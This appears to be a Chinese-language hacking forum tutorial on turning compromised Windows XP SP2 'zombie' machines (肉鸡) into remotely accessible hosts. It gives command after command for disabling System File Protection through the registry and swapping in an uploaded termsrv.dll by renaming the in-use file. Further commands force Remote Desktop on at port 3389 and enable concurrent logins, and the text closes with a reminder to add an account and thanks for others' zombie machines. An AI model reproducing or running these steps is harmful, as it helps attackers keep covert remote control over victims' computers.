条件:
1肉鸡是XPP2的
2你可以上传文件
3可以执行命令
4肉鸡重启后不会丢! (你要是有鸽子肉鸡,上面的条件很好满足的嘛!)

开工:

首先我们上传XPP2英文2055版的termsrv.dll文件,上传到C盘下, 然后干掉XP的系统文件保护,修改他的注册表(防止我们修改文件时弹出提示框来)

echo Windows Registry Editor Version 5.00>>20.reg

echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]>>20.reg echo SFCDisable=dword:ffffff9d>>20.reg

命令regedit /s 20.reg导入注册表

命令del 20.reg 删除

现在来替换文件(termsrv.dll文件系统里有2个,一个在dllcache文件夹里,一个在system32文件夹里 我们都替换掉)

命令:copy c:\termsrv.dll c:\windows\system32\dllcache\termsrv.dll 这个命令不用解释了吧,命令执行后有个提示,问你是否修改termsrv.dll文件,因为dllcache文件夹里有 一个termsrv.dll文件,选Y回车就可以了

再来替换system32下的termsrv.dll文件,你要是还直接还使用copy命令,肯定失败.提示文件在使用中. 我们来利用win系统的特性修改它,使用中的系统文件可以改名.

切换到system32目录 命令:rename termsrv.dll ter.dll

这个命令是把termsrv.dll文件改名为ter.dll<--这个名字可以随便改 命令:dir ter.dll 看看是否成功 命令:copy c:\termsrv.dll c:\windows\system32\termsrv.dll 把我们的termsrv.dll放到system32下

命令:dir termsrv.dll 查看一下 开启终端服务: 命令:sc config termservice start= auto

把终端服务状态改为自动,服务状态是禁用的话,你用net命令开可不起作用呦 启动服务命令:sc start termservice或net start termservice(这两个命令偶不喜欢,有时候不知道什么原因总不成功)

偶喜欢修改注册表:

echo Windows Registry Editor Version 5.00>>3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg

echo fDenyTSConnections=dword:00000000>>3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg

echo PortNumber=dword:00000D3D>>3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg

echo PortNumber=dword:000000D3D>>3389.reg

命令 regedit /s 3389.reg导入注册表

命令 del 3389.reg 删除

检查一下

命令: netstat -an 　find 3389

看看是否打开终端端口

最后还要修改注册表才能多用户登陆:

echo Windows Registry Editor Version 5.00>>21.reg

echo [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\Licensing Core]>>21.reg echo EnableConcurrentSessions=dword:00000001>>21.reg

命令regedit /s 21.reg导入注册表

命令del 21.reg 删除

重启肉鸡,肉鸡重启后,就会加载我们的termsrv.dll文件,(它原来的被我们改名了..嘎嘎) 等待肉鸡上线,就可以登陆了(不要忘了加个帐号哟)

感谢愛跳dě老鼠.奢望的灵魂以及老鼠的那些肉鸡